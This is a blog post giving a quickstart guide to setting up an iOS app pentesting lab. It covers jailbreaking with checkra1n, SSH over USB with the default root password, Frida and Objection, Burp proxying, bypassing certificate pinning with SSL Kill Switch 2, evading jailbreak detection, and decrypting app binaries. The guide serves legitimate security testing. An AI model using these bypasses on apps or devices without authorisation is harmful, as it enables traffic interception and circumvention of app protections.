Moreover, it's a major hassle to do even basic things like bypassing SSL certificate pinning. PortSwigger's Burp Suite Mobile Assistant needs to be installed on a jailbroken device and only works on iOS 9 and below.

For the longest time, iOS pentesting guides recommended buying an old iPhone with deprecated iOS versions off eBay. More recent efforts like Yogendra Jaiswal's excellent guide are based on the Unc0ver jailbreak, which works on iOS 11.0-12.4. If you don't have an iDevice in that range, you're out of luck.

Fortunately, with the release of the checkra1n jailbreak, A5-A11 iPhones, iPads, and iPods on the latest iOS can now be jailbroken. Many iOS app pentesting tools, having lain dormant during the long winter of jailbreaking, are now catching up, and new tools are also being released.

As such, I'm writing a quickstart guide for iOS app pentesting on modern devices with the checkra1n jailbreak, consolidating different tools' setup guides in one place. I will follow up with a post on bugs I've found in iOS apps using the tools installed here.

Quickstart

Hardware

Let's start with the basics. You need an A5-A11 iDevice, preferably an iPhone. I used an iPhone 8. Thanks to checkra1n, you don't really have to worry about the iOS version; as of now, it supports the latest iOS 13.3.

Unfortunately, checkra1n requires a macOS device for now, but Windows and Linux support is in the works.

Jailbreak

Warning: Jailbreaking your iDevice significantly weakens your security posture. You should not be doing this on your primary device. In fact, you should not use the jailbroken device for anything other than pentesting.

Take note that checkra1n is a semi-tethered jailbreak; every time you restart the iPhone, the jailbreak is lost, so you have to do this again.

  1. Download the latest checkra1n jailbreak at https://checkra.in/
  2. Connect your iPhone to your macOS device and open checkra1n with Applications → Right click checkra1n → Open.
  3. Unlock your iPhone and click “Start” in checkra1n
  4. Follow the rest of the steps in checkra1n and restart as necessary

checkra1n

Congrats! You have a jailbroken iPhone. Let's get down to business.

Cydia

This is super simple. On the jailbroken iPhone, open up the checkra1n app, then click “Cydia” in the “Install” section.

checkra1n app

Now you have Cydia and can install several packages that will help in your testing. More on that later.

iProxy

While you can SSH into your iPhone over the wireless network, it's a lot faster and more reliable to do that over USB.

  1. brew install libusbmuxd
  2. iproxy 2222 22
  3. In another terminal, run ssh root@localhost -p 2222
  4. For the password, enter alpine
  5. You should now have an SSH session in your iPhone

One perk is that you can also transfer files to and from your iPhone over SFTP using a client like FileZilla. Just select the SFTP protocol, set your host to localhost and port to 2222.

FileZilla settings

Frida and Objection

It's time to install my two favorite mobile app testing tools, Frida and Objection. I won't go into detail about their usage here, just the setup. Frida has an iOS guide I will refer to.

  1. On your macOS device, run pip3 install frida-tools
  2. On your iPhone, open Cydia and add Frida’s repository by going to Sources → Edit → Add and enter https://build.frida.re
  3. Go to Search → Enter Frida → Install
  4. Back on your macOS device, run pip3 install objection
  5. Finally, run objection --gadget "com.apple.AppStore" explore to check that everything is integrated properly

Proxy Traffic and Bypass Cert Pinning

Proxying traffic through Burp Suite is fairly standard; follow the steps outlined in Yogendra Jaiswal's post.

  1. On Burp Suite, go to Proxy → Options → Proxy Listener → Add → Bind to port: 1337 → Bind to address : All interfaces (or select a Specific Address) → “OK”
  2. On your iPhone, Settings → Wi-Fi → Info → Configure Proxy → Manual → Set server and port to the ones from the previous step
  3. On your iPhone, go to http://burp → Click “CA Certificate” → Download profile → Settings → General → Profiles & Device Management → Portswigger CA → Install

Now traffic should be proxied through Burp – except for apps that utilize certificate pinning. Fortunately, the SSL Kill Switch 2 certificate pinning bypass tool was recently updated to support iOS 13.

  1. Make sure you have the following packages installed in Cydia: wget, Debian Packager, Cydia Substrate, PreferenceLoader
  2. Go to the SSL Kill Switch 2 release page and copy the link to the latest .deb release
  3. SSH into your iPhone (see the iProxy section above) and run the following commands:
     wget <RELEASE URL FROM STEP 2>
     dpkg -i <DOWNLOADED PACKAGE NAME>
     killall -HUP SpringBoard
     rm <DOWNLOADED PACKAGE NAME>
  4. On your iPhone, go to Settings → SSL Kill Switch 2 (it should be at the bottom) → Disable Certificate Validation

SSL Kill Switch 2 settings

You should be good to go.

Bypass Jailbreak Detection

Jailbreak detection is annoying but solvable. Of all the packages that support iOS 13, I've found that the Liberty Lite Cydia module works the most consistently.

  1. On your iPhone, open Cydia and add module author Ryley Angus’ repository by going to Sources → Edit → Add and enter https://ryleyangus.com/repo/
  2. Go to Search → Enter Liberty Lite → Install
  3. Once installed, go to Settings → Liberty → Block Jailbreak Detection → Enable for the app you want to bypass

Kill and re-open your app. If it's still not bypassed, you can try other modules.

Liberty Lite settings

Dump App Files

Unlike Android apk files, the app binaries inside App Store ipa files are encrypted, preventing easy static analysis. Having installed iproxy and Frida, we can use frida-ios-dump to decrypt and dump the app at runtime.

  1. On your macOS device, git clone https://github.com/AloneMonkey/frida-ios-dump.git && cd frida-ios-dump
  2. sudo pip3 install -r requirements.txt --upgrade
  3. In another terminal, run iproxy 2222 22 if it's not already running
  4. To dump an app's file, ./dump.py <APP DISPLAY NAME OR BUNDLE IDENTIFIER>

Typically, I like to symlink the script so it's easily accessible from my PATH: ln -s <ABSOLUTE PATH TO dump.py> /usr/local/bin/dump-ipa. Now, whenever I want to dump an app, I can run the dump-ipa command from anywhere.

Conclusion

With this quickstart guide, you now have the basic tools set up to begin iOS app pentesting, from searching for secrets in the app files, to hooking classes, and of course testing the web API. Best of all, this is on modern iOS hardware and versions.

I hope this guide is helpful for those looking to set up their iOS testing labs. I will be following up with a writeup on several bugs I've found with these tools and hopefully point towards typical issues to look out for.

#ios #pentest #cybersecurity #frida #jailbreak
